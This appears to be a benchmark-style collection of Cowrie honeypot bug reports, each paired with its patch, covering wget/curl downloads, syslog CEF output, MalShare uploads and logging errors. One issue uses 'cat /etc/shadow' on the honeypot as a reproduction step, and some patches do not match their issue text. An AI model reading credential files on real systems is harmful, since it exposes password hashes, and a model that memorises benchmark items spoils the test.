+            # prevent cowrie from crashing if the terminal have been already destroyed
+            try:
+                self.protocol.logDispatch(eventid='cowrie.session.file_download.failed',
+                                          format='Attempt to download file(s) from URL (%(url)s) failed',
+                                          url=self.url)
+            except Exception:
+                pass
 
-        self.exit()
+            self.exit()
 
 
 # From http://code.activestate.com/recipes/525493/
 class HTTPProgressDownloader(client.HTTPDownloader):
 
     def __init__(self, wget, fakeoutfile, url, outfile, headers=None):
-        client.HTTPDownloader.__init__(self, url, outfile, headers=headers, agent=b'Wget/1.11.4')
+        client.HTTPDownloader.__init__(self, url, outfile, headers=headers, agent=b'Wget/1.11.4', followRedirect=False)
         self.status = None
         self.wget = wget
         self.fakeoutfile = fakeoutfile
Unable to WGET from an HTTPS website

**Describe the bug**
When trying to use wget to fetch a file from an HTTPS source, the emulator gets stuck. In the logs I can see that the code is failing to locate `CertificateOptions` from `twisted.internet.ssl`. That class doesn't exist as per current documentation.

**To Reproduce**
Steps to reproduce the behavior:
1. Run the agent (in my case through docker-cowrie)
2. Successfully connect to the honeypot via SSH
3. Run `wget https://raw.githubusercontent.com/cowrie/cowrie/master/README.rst`
4. The execution hangs indefinitely...

**Expected behavior**
The execution of wget should complete without issues.

**Server (please complete the following information):**
- OS: Debian Buster (via Docker using the docker-cowrie repo)

**Additional context**
The Twisted documentation has an entry for `CertificateOptions` (see [here](https://twistedmatrix.com/documents/current/api/twisted.internet.ssl.CertificateOptions.html)), so I tried manually editing the problematic lines (see [curl.py](https://github.com/cowrie/cowrie/blob/a5ff09f02dfa0f5d8a875f38e6dd536697561672/src/cowrie/commands/curl.py#L268) and [wget.py](https://github.com/cowrie/cowrie/blob/a5ff09f02dfa0f5d8a875f38e6dd536697561672/src/cowrie/commands/wget.py#L160)) and it worked. Unfortunately, I don't really have the time and means to fork the project and set up the development environment to make a PR at this time...
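A minimal standalone sketch of the TLS client setup the patch above switches to: `twisted.internet.ssl.optionsForClientTLS` replaces the removed `ssl.CertificateOptions(method=SSL.SSLv23_METHOD)` call. The host and URL below are just examples; the `connectSSL` call mirrors the patched code.

```python
from twisted.internet import reactor, ssl
from twisted.web.client import HTTPDownloader

host = "raw.githubusercontent.com"
url = b"https://raw.githubusercontent.com/cowrie/cowrie/master/README.rst"

# Download the URL to a local file over TLS with hostname verification.
factory = HTTPDownloader(url, "README.rst")
context_factory = ssl.optionsForClientTLS(hostname=host)
reactor.connectSSL(host, 443, factory, context_factory)

factory.deferred.addBoth(lambda result: reactor.stop())
reactor.run()
```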
2020-11-06T08:46:46
cowrie/cowrie
1,463
cowrie__cowrie-1463
[ "1459" ]
f64285beb793f0ae1802d58e918311503aa3e42d
diff --git a/src/cowrie/output/localsyslog.py b/src/cowrie/output/localsyslog.py
--- a/src/cowrie/output/localsyslog.py
+++ b/src/cowrie/output/localsyslog.py
@@ -45,6 +45,7 @@ class Output(cowrie.core.output.Output):
     def start(self):
         self.format = CowrieConfig().get('output_localsyslog', 'format')
         facilityString = CowrieConfig().get('output_localsyslog', 'facility')
+        levelString = CowrieConfig().get('output_localsyslog', 'level')
         self.facility = vars(syslog)['LOG_' + facilityString]
         self.syslog = twisted.python.syslog.SyslogObserver(prefix='cowrie', facility=self.facility)
 
@@ -57,7 +58,7 @@ def write(self, logentry):
 
         if self.format == 'cef':
             self.syslog.emit({
-                'message': cowrie.core.cef.formatCef(logentry),
+                'message': [cowrie.core.cef.formatCef(logentry)],
                 'isError': False,
                 'system': 'cowrie'
             })
CEF spaces between each character

I followed the 7 steps at https://cowrie.readthedocs.io/en/latest/INSTALL.html#step-1-install-dependencies and set up CEF in the config file:
```
[output_localsyslog]
enabled = true
facility = USER
format = cef
```
But the output I'm getting has a bunch of spaces; there seems to be a space between each character, as below:
```
Nov 26 04:42:45 cowrie cowrie: [cowrie] C E F : 0 | C o w r i e | C o w r i e | 1 . 0 | c o w r i e . s e s s i o n . c o n n e c t | c o w r i e . s e s s i o n . c o n n e c t | 5 | a p p = S S H v 2 d e s t i n a t i o n S e r v i c e n a m e = s s h d d e v i c e E x t e r n a l I d = c o w r i e m s g = N e w c o n n e c t i o n : 1 9 2 . 1 6 8 . 2 . 5 7 : 3 3 6 2 6 ( 1 9 2 . 1 6 8 . 2 . 6 4 : 2 2 2 2 ) [ s e s s i o n : 8 a 9 0 7 9 8 c 8 9 f d ] s r c = 1 9 2 . 1 6 8 . 2 . 5 7 p r o t o = t c p s p t = 3 3 6 2 6 d p t = 2 2 2 2 d s t = 1 9 2 . 1 6 8 . 2 . 6 4
Nov 26 04:42:46 cowrie cowrie: [cowrie] C E F : 0 | C o w r i e | C o w r i e | 1 . 0 | c o w r i e . c l i e n t . v e r s i o n | c o w r i e . c l i e n t . v e r s i o n | 5 | a p p = S S H v 2 d e s t i n a t i o n S e r v i c e n a m e = s s h d d e v i c e E x t e r n a l I d = c o w r i e m s g = R e m o t e S S H v e r s i o n : b ' S S H - 2 . 0 - O p e n S S H _ 8 . 2 p 1 U b u n t u - 4 u b u n t u 0 . 1 ' s r c = 1 9 2 . 1 6 8 . 2 . 5 7 p r o t o = t c p
Nov 26 04:42:46 cowrie cowrie: [cowrie] C E F : 0 | C o w r i e | C o w r i e | 1 . 0 | c o w r i e . c l i e n t . k e x | c o w r i e . c l i e n t . k e x | 5 | a p p = S S H v 2 d e s t i n a t i o n S e r v i c e n a m e = s s h d d e v i c e E x t e r n a l I d = c o w r i e m s g = S S H c l i e n t h a s s h f i n g e r p r i n t : a e 8 b d 7 d d 0 9 9 7 0 5 5 5 a a 4 c 6 e d 2 2 a d b b f 5 6 s r c = 1 9 2 . 1 6 8 . 2 . 5 7 p r o t o = t c p
```
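The symptom matches how Twisted's legacy log machinery renders `event['message']`: the value is joined with spaces, so a bare string gets iterated character by character, while a one-element list (what the patch wraps the CEF string in) renders intact. A tiny standalone illustration:

```python
msg = "CEF:0|Cowrie|Cowrie|1.0|cowrie.session.connect|..."

# Joining a string iterates its characters -> one space between each character.
print(" ".join(msg))    # C E F : 0 | C o w r i e | ...

# Joining a one-element list leaves the message intact.
print(" ".join([msg]))  # CEF:0|Cowrie|Cowrie|1.0|...
```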
2020-11-26T14:32:43
cowrie/cowrie
1,472
cowrie__cowrie-1472
[ "1471" ]
d0739a434bc174d4a421bb5920595368c71796a6
diff --git a/src/cowrie/output/malshare.py b/src/cowrie/output/malshare.py
--- a/src/cowrie/output/malshare.py
+++ b/src/cowrie/output/malshare.py
@@ -41,7 +41,10 @@
     from urlparse import urlparse
 
 import requests
 
+from twisted.python import log
+
 import cowrie.core.output
+from cowrie.core.config import CowrieConfig
 
 
 class Output(cowrie.core.output.Output):
@@ -54,7 +57,7 @@ def start(self):
         """
         Start output plugin
         """
-        pass
+        self.apiKey = CowrieConfig().get('output_malshare', 'api_key')
 
     def stop(self):
         """
@@ -64,7 +67,6 @@
     def write(self, entry):
         if entry["eventid"] == "cowrie.session.file_download":
-            print("Sending file to MalShare")
             p = urlparse(entry["url"]).path
             if p == "":
                 fileName = entry["shasum"]
@@ -78,7 +80,6 @@
                 self.postfile(entry["outfile"], fileName)
 
         elif entry["eventid"] == "cowrie.session.file_upload":
-            print("Sending file to MalShare")
             self.postfile(entry["outfile"], entry["filename"])
 
     def postfile(self, artifact, fileName):
@@ -87,12 +88,12 @@ def postfile(self, artifact, fileName):
         """
         try:
             res = requests.post(
-                "https://malshare.com/api.php?mode=cli",
-                files={fileName: open(artifact, "rb")}
+                "https://malshare.com/api.php?api_key="+self.apiKey+"&action=upload",
+                files={"upload": open(artifact, "rb")}
             )
             if res and res.ok:
-                print("Submited to MalShare")
+                log.msg("Submitted to MalShare")
             else:
-                print("MalShare Request failed: {}".format(res.status_code))
+                log.msg("MalShare Request failed: {}".format(res.status_code))
         except Exception as e:
-            print("MalShare Request failed: {}".format(e))
+            log.msg("MalShare Request failed: {}".format(e))
MalShare uploader not working

**Describe the bug**
In my config I have
```
[output_malshare]
enabled = true
```
and in my logs I have
```
[stdout#info] Sending file to MalShare
[stdout#info] Submited to MalShare
```
but when I check on MalShare I can't find any of the binaries that have been caught in my honeypot.

**To Reproduce**
Steps to reproduce the behavior:
1. Enable MalShare submission in your config
2. Wait for a bot to drop a binary in your honeypot
3. Try to find the binary on MalShare (search by md5)
4. Observe that the binary is not there

**Expected behavior**
The binary should be uploaded successfully to MalShare.

**Server (please complete the following information):**
- OS: Ubuntu 20.04, Linux 5.4.0
- Python: 3.8.5

**Additional context**
Based on [MalShare's API docs](https://malshare.com/doc.php) it seems that uploading files now requires an API key and a slightly different POST path than the one [defined in cowrie](https://github.com/cowrie/cowrie/blob/b848ec261554ee9128640601eb9a6734b2bffefe/src/cowrie/output/malshare.py#L90). Probably adding an API key option to the config and updating the uploader with the new path and the API key will solve this.
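A minimal standalone sketch of the newer upload call the patch adopts. The API key and file name are placeholders; the endpoint and the `upload` form field mirror the patched code:

```python
import requests

API_KEY = "YOUR_MALSHARE_API_KEY"  # placeholder, set from your own config


def upload_to_malshare(path: str) -> int:
    """POST a sample to MalShare and return the HTTP status code."""
    with open(path, "rb") as f:
        res = requests.post(
            f"https://malshare.com/api.php?api_key={API_KEY}&action=upload",
            files={"upload": f},
        )
    return res.status_code


print(upload_to_malshare("sample.bin"))
```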
2020-12-23T11:39:45
cowrie/cowrie
1,482
cowrie__cowrie-1482
[ "1481" ]
1f443b98444386e64cd90821699c6e943db3ca38
diff --git a/src/cowrie/output/mysql.py b/src/cowrie/output/mysql.py
--- a/src/cowrie/output/mysql.py
+++ b/src/cowrie/output/mysql.py
@@ -144,12 +144,12 @@
         elif entry["eventid"] == 'cowrie.session.file_download':
             self.simpleQuery('INSERT INTO `downloads` (`session`, `timestamp`, `url`, `outfile`, `shasum`) '
                              'VALUES (%s, FROM_UNIXTIME(%s), %s, %s, %s)',
-                             (entry["session"], entry["time"], entry['url'], entry['outfile'], entry['shasum']))
+                             (entry["session"], entry["time"], entry.get("url", ""), entry['outfile'], entry['shasum']))
 
         elif entry["eventid"] == 'cowrie.session.file_download.failed':
             self.simpleQuery('INSERT INTO `downloads` (`session`, `timestamp`, `url`, `outfile`, `shasum`) '
                              'VALUES (%s, FROM_UNIXTIME(%s), %s, %s, %s)',
-                             (entry["session"], entry["time"], entry['url'], 'NULL', 'NULL'))
+                             (entry["session"], entry["time"], entry.get("url", ""), 'NULL', 'NULL'))
 
         elif entry["eventid"] == 'cowrie.session.file_upload':
             self.simpleQuery('INSERT INTO `downloads` (`session`, `timestamp`, `url`, `outfile`, `shasum`) '
Mysql error? [twisted.internet.defer#critical] Unhandled error in Deferred

```
2021-01-11T16:54:56.352309Z [CowrieTelnetTransport,2,41.13.224.97] login attempt [b'root'/b'5up'] succeeded
2021-01-11T16:54:56.353787Z [CowrieTelnetTransport,2,41.13.224.97] Initialized emulated server as architecture: linux-x64-lsb
2021-01-11T16:54:56.354732Z [twisted.internet.defer#critical] Unhandled error in Deferred:
2021-01-11T16:54:56.354941Z [twisted.internet.defer#critical]
Traceback (most recent call last):
  File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/logger/_legacy.py", line 93, in __call__
    self.legacyObserver(event)
  File "/home/cowrie/cowrie/src/cowrie/core/output.py", line 218, in emit
    self.write(ev)
  File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/internet/defer.py", line 1613, in unwindGenerator
    return _cancellableInlineCallbacks(gen)
  File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/internet/defer.py", line 1529, in _cancellableInlineCallbacks
    _inlineCallbacks(None, g, status)
--- <exception caught here> ---
  File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/internet/defer.py", line 1418, in _inlineCallbacks
    result = g.send(result)
  File "/home/cowrie/cowrie/src/cowrie/output/mysql.py", line 147, in write
    (entry["session"], entry["time"], entry['url'], entry['outfile'], entry['shasum']))
builtins.KeyError: 'url'
2021-01-11T16:54:56.413032Z [CowrieTelnetTransport,2,41.13.224.97] Warning: state changed and new state returned
```
I saw this issue too. I suppose this happens when a visitor uploads a file to your honeypot using scp. In this case, there is clearly no URL defined, and the error here is raised exactly because there is no `url` key in the `entry` object.

I fixed it by replacing `entry["url"]` with `entry.get("url", "")`. Now if there is no URL present in the event, it will simply be set to an empty value. A code snippet from my `src/cowrie/output/mysql.py`:
```
elif entry["eventid"] == 'cowrie.session.file_download':
    self.simpleQuery('INSERT INTO `downloads` (`session`, `timestamp`, `url`, `outfile`, `shasum`) '
                     'VALUES (%s, FROM_UNIXTIME(%s), %s, %s, %s)',
                     (entry["session"], entry["time"], entry.get("url", ""), entry['outfile'], entry['shasum']))

elif entry["eventid"] == 'cowrie.session.file_download.failed':
    self.simpleQuery('INSERT INTO `downloads` (`session`, `timestamp`, `url`, `outfile`, `shasum`) '
                     'VALUES (%s, FROM_UNIXTIME(%s), %s, %s, %s)',
                     (entry["session"], entry["time"], entry.get("url", ""), 'NULL', 'NULL'))
```
I can make a pull request if there is no better idea how to solve this.
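The fix relies on `dict.get` returning a default instead of raising. A one-minute standalone check; the event dict below is illustrative, not a real Cowrie event:

```python
# An scp upload produces a file_download event without a "url" key.
entry = {"session": "abc123", "time": 1610380496, "outfile": "/tmp/x", "shasum": "d0d0"}

# entry["url"] would raise KeyError: 'url'
print(entry.get("url", ""))  # prints an empty string instead of crashing
```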
2021-01-12T21:56:45
cowrie/cowrie
1,551
cowrie__cowrie-1551
[ "1549" ]
f2f1b3b150371d77f6eda651270ef9810148c5c6
diff --git a/src/cowrie/core/output.py b/src/cowrie/core/output.py
--- a/src/cowrie/core/output.py
+++ b/src/cowrie/core/output.py
@@ -158,7 +158,7 @@ def emit(self, event: dict) -> None:
         if "message" not in event and "format" not in event:
             return
 
-        ev: Dict[str, any] = event  # type: ignore
+        ev: Dict[str, any] = event.copy()  # type: ignore
         ev["sensor"] = self.sensor
 
         if "isError" in ev:
builtins.KeyError: 'log_time' Python error

**Describe the bug**
Cowrie won't log properly because the output plugins are not working (output_splunk). The following error occurs:
```
2021-04-28T07:00:17.796991Z [twisted.logger._observer#critical] Temporarily disabling observer LegacyLogObserverWrapper(<bound method Output.emit of <cowrie.output.virustotal.Output object at 0x7f3a13c9c550>>) due to exception: [Failure instance: Traceback: <class 'KeyError'>: 'log_time'
/home/cowrie/cowrie/src/cowrie/ssh/transport.py:246:connectionLost
/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/threadable.py:51:sync
/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/log.py:281:msg
/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/logger/_legacy.py:147:publishToNewObserver
--- <exception caught here> ---
/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/logger/_observer.py:82:__call__
/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/logger/_legacy.py:55:__call__
]
Traceback (most recent call last):
  File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 246, in connectionLost
    log.msg(
  File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/threadable.py", line 51, in sync
    return function(self, *args, **kwargs)
  File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/log.py", line 281, in msg
    _publishNew(self._publishPublisher, actualEventDict, textFromEventDict)
  File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/logger/_legacy.py", line 147, in publishToNewObserver
    observer(eventDict)
--- <exception caught here> ---
  File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/logger/_observer.py", line 82, in __call__
    observer(event)
  File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/logger/_legacy.py", line 55, in __call__
    event["time"] = event["log_time"]
builtins.KeyError: 'log_time'
```

**To Reproduce**
Steps to reproduce the behavior:
1. git clone cowrie
2. set up venv
3. set up cowrie.cfg
4. include splunk output
5. run cowrie
6. run honeypot session

**Expected behavior**
Cowrie should log properly.

**Server (please complete the following information):**
- OS: `Linux cowrie-1 5.4.103-1-pve #1 SMP PVE 5.4.103-1 (Sun, 07 Mar 2021 15:55:09 +0100) x86_64 x86_64 x86_64 GNU/Linux`
- Python: Python 3.8.6
Thanks for reporting this, I'm running into the same error with other output such as textlog, MySQL and SQLite as well. Steps to reproduce are the same, with the difference of setting up those output methods in the cowrie.cfg file.

Thanks for notifying about this! Maybe something has changed upstream in Twisted. I'll investigate.

I'm trying to replicate this, but I can't seem to, which makes me think it might be something in your environment. Which version of Twisted are you using? And which version of Cowrie (downloaded version or git pull)?

The output of pip show twisted:
```
Name: Twisted
Version: 21.2.0
Summary: An asynchronous networking framework written in Python
Home-page: https://twistedmatrix.com/
Author: Twisted Matrix Laboratories
Author-email: [email protected]
License: MIT
Location: /home/cowrie/cowrie/cowrie-env/lib/python3.7/site-packages
Requires: constantly, hyperlink, attrs, incremental, Automat, zope.interface
Required-by: treq
```
I set up Cowrie according to the documentation and cloned the repo. (Sorry if this double posts, I sent a reply earlier via email but it doesn't seem to add to the thread.)

Okay, I can reproduce it now. Thanks for the info! I tried with the virustotal plugin earlier, but now I get the error with `textlog`.
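The one-character fix in the patch (`event.copy()`) addresses dict aliasing: every observer receives the same event dict, so an observer that mutates it in place corrupts what later observers see. A standalone illustration; the observer bodies are simplified stand-ins, not Cowrie's real code:

```python
event = {"log_time": 1619593817.79, "message": ("connection lost",)}


def cowrie_emit(ev, fixed: bool) -> None:
    if fixed:
        ev = ev.copy()           # work on a private copy (the patched behavior)
    ev["sensor"] = "myhost"
    del ev["log_time"]           # any in-place mutation leaks to other observers


def legacy_observer(ev) -> None:
    ev["time"] = ev["log_time"]  # KeyError: 'log_time' if a prior observer deleted it


cowrie_emit(event, fixed=True)
legacy_observer(event)           # fine: the shared dict was never mutated
print("ok:", event["time"])
```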
2021-05-02T05:09:09
cowrie/cowrie
1,563
cowrie__cowrie-1563
[ "1560" ]
0cd1fd89de824dd1e374fdec06b004cc87d9a0b5
diff --git a/src/cowrie/output/mysql.py b/src/cowrie/output/mysql.py
--- a/src/cowrie/output/mysql.py
+++ b/src/cowrie/output/mysql.py
@@ -95,14 +95,14 @@ def simpleQuery(self, sql, args):
     def write(self, entry):
         if entry["eventid"] == "cowrie.session.connect":
             r = yield self.db.runQuery(
-                f"SELECT `id`\" \"FROM `sensors`\" \"WHERE `ip` = {self.sensor}"
+                "SELECT `id`" "FROM `sensors`" f"WHERE `ip` = {self.sensor}"
             )
 
             if r:
                 sensorid = r[0][0]
             else:
                 yield self.db.runQuery(
-                    f"INSERT INTO `sensors` (`ip`) \" \"VALUES ({self.sensor})"
+                    "INSERT INTO `sensors` (`ip`) " f"VALUES ({self.sensor})"
                 )
 
                 r = yield self.db.runQuery("SELECT LAST_INSERT_ID()")
9may
2021-05-23T05:10:31
cowrie/cowrie
1,564
cowrie__cowrie-1564
[ "1562" ]
0cd1fd89de824dd1e374fdec06b004cc87d9a0b5
diff --git a/setup.py b/setup.py
--- a/setup.py
+++ b/setup.py
@@ -36,7 +36,7 @@
     ],
     setup_requires=["incremental", "click"],
     install_requires=[
-        "twisted>=17.1.0",
+        "twisted==21.1.0",
         "cryptography>=0.9.1",
         "configparser",
         "pyopenssl",
@@ -48,7 +48,7 @@
         "service_identity>=14.0.0",
     ],
     extras_require={
-        "csirtg": ["csirtgsdk>=0.0.0a17"],
+        "csirtg": ["csirtgsdk==1.1.5"],
         "dshield": ["requests"],
         "elasticsearch": ["pyes"],
         "mysql": ["mysqlclient"],
diff --git a/src/cowrie/output/csirtg.py b/src/cowrie/output/csirtg.py
--- a/src/cowrie/output/csirtg.py
+++ b/src/cowrie/output/csirtg.py
@@ -1,41 +1,50 @@
 import os
 from datetime import datetime
 
-from csirtgsdk.client import Client
-from csirtgsdk.indicator import Indicator
-
 from twisted.python import log
 
 import cowrie.core.output
 from cowrie.core.config import CowrieConfig
 
-USERNAME = os.environ.get("CSIRTG_USER")
-FEED = os.environ.get("CSIRTG_FEED")
-TOKEN = os.environ.get("CSIRG_TOKEN")
-DESCRIPTION = os.environ.get("CSIRTG_DESCRIPTION", "random scanning activity")
+token = CowrieConfig.get("output_csirtg", "token", fallback="a1b2c3d4")
+if token == "a1b2c3d4":
+    log.msg("output_csirtg: token not found in configuration file")
+    exit(1)
+
+os.environ["CSIRTG_TOKEN"] = token
+import csirtgsdk  # noqa: E402
 
 
 class Output(cowrie.core.output.Output):
     """
-    csirtg output
+    CSIRTG output
     """
 
-    def start(
-        self,
-    ):
-        self.user = CowrieConfig.get("output_csirtg", "username") or USERNAME
-        self.feed = CowrieConfig.get("output_csirtg", "feed") or FEED
-        self.token = CowrieConfig.get("output_csirtg", "token") or TOKEN
-        self.description = CowrieConfig.get(
-            "output_csirtg", "description", fallback=DESCRIPTION
-        )
+    def start(self):
+        """
+        Start the output module.
+        Note that csirtsdk is imported here because it reads CSIRTG_TOKEN on import
+        Cowrie sets this environment variable.
+        """
+        self.user = CowrieConfig.get("output_csirtg", "username")
+        self.feed = CowrieConfig.get("output_csirtg", "feed")
+        self.debug = CowrieConfig.getboolean("output_csirtg", "debug", fallback=False)
+        self.description = CowrieConfig.get("output_csirtg", "description")
+
         self.context = {}
-        self.client = Client(token=self.token)
+        # self.client = csirtgsdk.client.Client()
 
     def stop(self):
         pass
 
     def write(self, e):
+        """
+        Only pass on connection events
+        """
+        if e["eventid"] == "cowrie.session.connect":
+            self.submitIp(e)
+
+    def submitIp(self, e):
         peerIP = e["src_ip"]
         ts = e["timestamp"]
         system = e.get("system", None)
@@ -77,5 +86,12 @@
             "description": self.description,
         }
 
-        ret = Indicator(self.client, i).submit()
-        log.msg("logged to csirtg {} ".format(ret["location"]))
+        if self.debug is True:
+            log.msg(f"output_csirtg: Submitting {i!r} to CSIRTG")
+
+        ind = csirtgsdk.indicator.Indicator(i).submit()
+
+        if self.debug is True:
+            log.msg(f"output_csirtg: Submitted {ind!r} to CSIRTG")
+
+        log.msg("output_csirtg: submitted to csirtg at {} ".format(ind["location"]))
/etc/shadow file contents are incorrect

**Describe the bug**
In the latest honeypot from the master branch, a `cat /etc/shadow` outputs a readme file instead of password contents. It looks like commit 937402ece56a4d272713ea38be32c6dc4191390a replaced the file contents.

**To Reproduce**
- enter honeypot as root
- Run: `cat /etc/shadow`

**Expected behavior**
Expecting shadow-file-format output, not a readme.

**Server (please complete the following information):**
- Using the docker image built on 14 May 2021
2021-05-23T06:39:56
cowrie/cowrie
1,568
cowrie__cowrie-1568
[ "1567", "1567" ]
9af813994e15978630b62d27d7ae112c0471236d
diff --git a/src/cowrie/commands/curl.py b/src/cowrie/commands/curl.py
--- a/src/cowrie/commands/curl.py
+++ b/src/cowrie/commands/curl.py
@@ -268,10 +268,13 @@ def download(self, url, fakeoutfile, outputfile, *args, **kwargs):
             self.exit()
             return None
 
-        # TODO: need to do full name resolution.
-        if ipaddress.ip_address(host).is_private:
-            self.errorWrite("curl: (6) Could not resolve host: {}\n".format(host))
-            return None
+        # TODO: need to do full name resolution in case someon passes DNS name pointing to local address
+        try:
+            if ipaddress.ip_address(host).is_private:
+                self.errorWrite("curl: (6) Could not resolve host: {}\n".format(host))
+                return None
+        except ValueError:
+            pass
 
         factory = HTTPProgressDownloader(
             self, fakeoutfile, url, outputfile, *args, **kwargs
diff --git a/src/cowrie/commands/wget.py b/src/cowrie/commands/wget.py
--- a/src/cowrie/commands/wget.py
+++ b/src/cowrie/commands/wget.py
@@ -154,14 +154,17 @@ def download(self, url, fakeoutfile, *args, **kwargs):
         self.errorWrite("HTTP request sent, awaiting response... ")
 
         # TODO: need to do full name resolution.
-        if ipaddress.ip_address(host).is_private:
-            self.errorWrite(
-                "Resolving {} ({})... failed: nodename nor servname provided, or not known.\n".format(
-                    host, host
+        try:
+            if ipaddress.ip_address(host).is_private:
+                self.errorWrite(
+                    "Resolving {} ({})... failed: nodename nor servname provided, or not known.\n".format(
+                        host, host
+                    )
                 )
-            )
             self.errorWrite("wget: unable to resolve host address ‘{}’\n".format(host))
             return None
+        except ValueError:
+            pass
 
         # File in host's fs that will hold content of the downloaded file
         # HTTPDownloader will close() the file object so need to preserve the name
Unable to curl or wget URL with hostname

If you try to download anything via curl or wget and the URL contains a hostname instead of an IP address, it crashes. I am pretty sure it is because of
https://github.com/cowrie/cowrie/pull/1557/commits/0b3b257e0ecf10b5b4d381d724cf4c3e23f0ed81 and
https://github.com/cowrie/cowrie/pull/1557/commits/ff6bfdcdb75fefbc35ac19fad7c98c0f69da48b7
(the line marked `# TODO: need to do full name resolution.`).

Example:
```
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@czbrqobpvmssd01:~# wget notino.cz
Connection to czbrqobpvmssd01 closed by remote host.
Connection to czbrqobpvmssd01 closed.
```

```
2021-05-28T14:13:00.312387Z [HoneyPotSSHTransport,9,172.16.23.9] Unhandled Error
Traceback (most recent call last):
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 101, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/log.py", line 85, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/python/context.py", line 83, in callWithContext
    return func(*args, **kw)
--- <exception caught here> ---
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/posixbase.py", line 687, in _doReadOrWrite
    why = selectable.doRead()
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 246, in doRead
    return self._dataReceived(data)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/internet/tcp.py", line 251, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 141, in dataReceived
    self.dispatchMessage(messageNum, packet[1:])
  File "/home/cowrie/cowrie/src/cowrie/ssh/transport.py", line 145, in dispatchMessage
    transport.SSHServerTransport.dispatchMessage(self, message_num, payload)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/transport.py", line 747, in dispatchMessage
    self.service.packetReceived(messageNum, payload)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/service.py", line 47, in packetReceived
    return f(packet)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/connection.py", line 265, in ssh_CHANNEL_DATA
    channel.dataReceived(data)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 174, in dataReceived
    self.client.transport.write(data)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/ssh/session.py", line 230, in write
    self.proto.dataReceived(data)
  File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 125, in dataReceived
    insults.ServerProtocol.dataReceived(self, data)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/insults/insults.py", line 520, in dataReceived
    self.terminalProtocol.keystrokeReceived(ch, None)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 436, in keystrokeReceived
    m()
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 328, in handle_RETURN
    return recvline.RecvLine.handle_RETURN(self)
  File "/home/cowrie/cowrie/cowrie-env/lib64/python3.6/site-packages/twisted/conch/recvline.py", line 494, in handle_RETURN
    self.lineReceived(line)
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 189, in lineReceived
    self.cmdstack[-1].lineReceived(line)
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 116, in lineReceived
    self.runCommand()
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 325, in runCommand
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]["rargs"])
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 309, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 198, in call_command
    obj.start()
  File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 122, in start
    self.deferred = self.download(self.url, self.outfile)
  File "/home/cowrie/cowrie/src/cowrie/commands/wget.py", line 157, in download
    if ipaddress.ip_address(host).is_private:
  File "/usr/lib64/python3.6/ipaddress.py", line 54, in ip_address
    address)
builtins.ValueError: 'notino.cz' does not appear to be an IPv4 or IPv6 address
```
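The guard pattern the patch adds: `ipaddress.ip_address()` raises `ValueError` for anything that is not an IP literal, so the check must be wrapped before falling through to normal handling. A minimal standalone sketch of that pattern (the helper name is illustrative):

```python
import ipaddress


def is_private_address(host: str) -> bool:
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        # 'notino.cz' is not an IP literal; a full fix would resolve the
        # name first, as the TODO comments in the patched code note.
        return False


print(is_private_address("192.168.2.64"))  # True
print(is_private_address("notino.cz"))     # False, no crash
```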
2021-05-29T04:35:37
cowrie/cowrie
1,575
cowrie__cowrie-1575
[ "1567" ]
705de8e16cee9c3bece4cc247ff1bcc5b9220e93
diff --git a/src/cowrie/output/mysql.py b/src/cowrie/output/mysql.py
--- a/src/cowrie/output/mysql.py
